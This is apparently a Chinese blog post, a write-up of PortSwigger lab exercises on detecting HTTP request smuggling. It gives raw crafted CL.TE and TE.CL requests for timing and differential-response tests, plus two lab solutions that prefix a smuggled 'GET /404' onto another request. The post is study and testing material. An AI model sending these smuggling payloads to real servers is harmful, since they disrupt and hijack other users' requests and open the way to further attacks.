Finding HTTP request smuggling vulnerabilities - 查找HTTP请求走私漏洞

上篇:HTTP request smuggling - HTTP协议走私
完整版还是去官网看吧,这里只是记一点关键的>>>官网<<<

1.使用定时技术查找CL.TE漏洞

POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4

1
A
X

ps: x是一个十六进制的数
由于前端服务器使用内容长度标头,它将只转发该请求的一部分,忽略X。后端服务器使用传输编码头,处理第一个块,然后等待下一个块到达。这将导致一个可观察的时间延迟。

image.png

2.使用定时技术查找TE.CL漏洞

POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 6

0

X

由于前端服务器使用传输编码头,它将只转发此请求的一部分,忽略X。后端服务器使用内容长度标头,期望消息正文中有更多内容,并等待剩余内容到达。这将导致一个可观察的时间延迟。


image.png

如果该应用程序易受该漏洞的CL.TE变体的攻击, 基于时间的TE.CL漏洞测试可能会影响其他应用程序用户。因此,为了保持隐秘性和最小化干扰,您应该首先使用CL.TE测试,只有在第一次测试失败时才继续进行TE.CL测试。

3.使用差异响应确认HTTP请求走私漏洞

快速地向应用程序发送两个请求:

  • 一个“攻击”请求,旨在干扰下一个请求的处理。
  • 一个“正常”的请求。

3.1使用差异响应确认CL.TE漏洞

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x

如果攻击成功,则后端服务器将此请求的最后两行视为属于接收的下一个请求。这将导致随后的“正常”请求如下所示:

GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling

做题:


image.png

这道题是让你通过请求走私,使下一个正常的GET根目录的请求报404

访问题目后 在Repeater中准备两个请求,一个是POST的攻击请求,一个是GET的访问根目录的请求(拦截一下访问主页的请求,然后转一下就行)


POST攻击请求

访问根目录的GET请求

先发送POST攻击请求进行请求走私,在后端服务器的内存里留下

GET /404 HTTP/1.1
foo:

然后这部分请求就会和下一个正常GET根目录的请求拼接到一起了

GET /404 HTTP/1.1
foo:GET / HTTP/1.1
Host: accd1fb51f665066808f0011001600ac.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=IwRFKZDrpZyZh1au8Tqyl0vTb7lFuWgh
Upgrade-Insecure-Requests: 1

然后对于这个正常请求服务器报404了

3.2使用差异响应确认TE.CL漏洞

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0
#\r\n
#\r\n

做题:


image.png

题目要求和前一题一样


POST攻击包

GET根目录的正常请求

截图截晚了,没法看到响应了,但结果是对的

注意:
在试图通过干扰其他请求确认请求走私漏洞时,应考虑到一些重要因素:

  • 应该使用不同的网络连接将“攻击”请求和“正常”请求发送到服务器。通过相同的连接发送两个请求并不能证明该漏洞的存在。
  • “攻击”请求和“正常”请求应尽可能使用相同的URL和参数名称。这是因为许多现代应用程序根据URL和参数将前端请求路由到不同的后端服务器。使用相同的URL和参数会增加请求由同一后端服务器处理的可能性,这是攻击工作所必需的。
  • 当测试“正常”请求以检测来自“攻击”请求的任何干扰时,您正在与应用程序同时接收的任何其他请求竞争,包括来自其他用户的请求。您应该在“攻击”请求之后立即发送“正常”请求。如果应用程序很忙,则可能需要执行多次尝试来确认该漏洞。
  • 在某些应用中,前端服务器充当负载均衡器,并根据某些负载平衡算法将请求转发给不同的后端系统。如果您的“攻击”和“正常”请求被转发到不同的后端系统,则攻击将失败。这也是您可能需要尝试几次才能确认漏洞的另一个原因。
  • 如果您的攻击成功地干扰了随后的请求,但这不是您为检测干扰而发送的“正常”请求,那么这意味着另一个应用程序用户受到了您的攻击的影响。如果您继续执行测试,这可能会对其他用户产生破坏性影响,您应该谨慎行事。

下一篇:Exploiting HTTP request smuggling vulnerabilities - 利用HTTP请求走私漏洞

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,332评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,508评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,812评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,607评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,728评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,919评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,071评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,802评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,256评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,576评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,712评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,389评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,032评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,798评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,026评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,473评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,606评论 2 350